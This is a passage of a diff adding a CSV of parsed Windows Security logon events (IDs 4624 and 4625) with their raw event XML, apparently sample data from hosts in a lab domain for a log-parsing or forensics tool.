+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.517594Z"">
+    </TimeCreated>
+    <EventRecordID>768621</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff89</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.507713Z"">
+    </TimeCreated>
+    <EventRecordID>768620</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff6e</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:32.174941Z"">
+    </TimeCreated>
+    <EventRecordID>768619</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31fb1a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50437</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:28:32.159991Z"">
+    </TimeCreated>
+    <EventRecordID>768618</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1636"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31daf6</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50436</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714758Z"">
+    </TimeCreated>
+    <EventRecordID>137225</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd964</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd8f6</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714613Z"">
+    </TimeCreated>
+    <EventRecordID>137224</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd8f6</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd964</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:25.377120Z"">
+    </TimeCreated>
+    <EventRecordID>137223</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""712"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x25c</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4625</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8010000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:23.627952Z"">
+    </TimeCreated>
+    <EventRecordID>137222</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""Status"">0xc000006d</Data>
+    <Data Name=""FailureReason"">%%2313</Data>
+    <Data Name=""SubStatus"">0xc000006a</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:25.097874Z"">
+    </TimeCreated>
+    <EventRecordID>2988550</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x568d99</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64229</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:22.920903Z"">
+    </TimeCreated>
+    <EventRecordID>2988547</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4528"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x56874b</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64227</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:22.906195Z"">
+    </TimeCreated>
+    <EventRecordID>2988544</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4524"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x5686d9</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64226</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:20.521162Z"">
+    </TimeCreated>
+    <EventRecordID>2988535</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2908"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-220106</Data>
+    <Data Name=""TargetUserName"">samir</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x567758</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">-</Data>
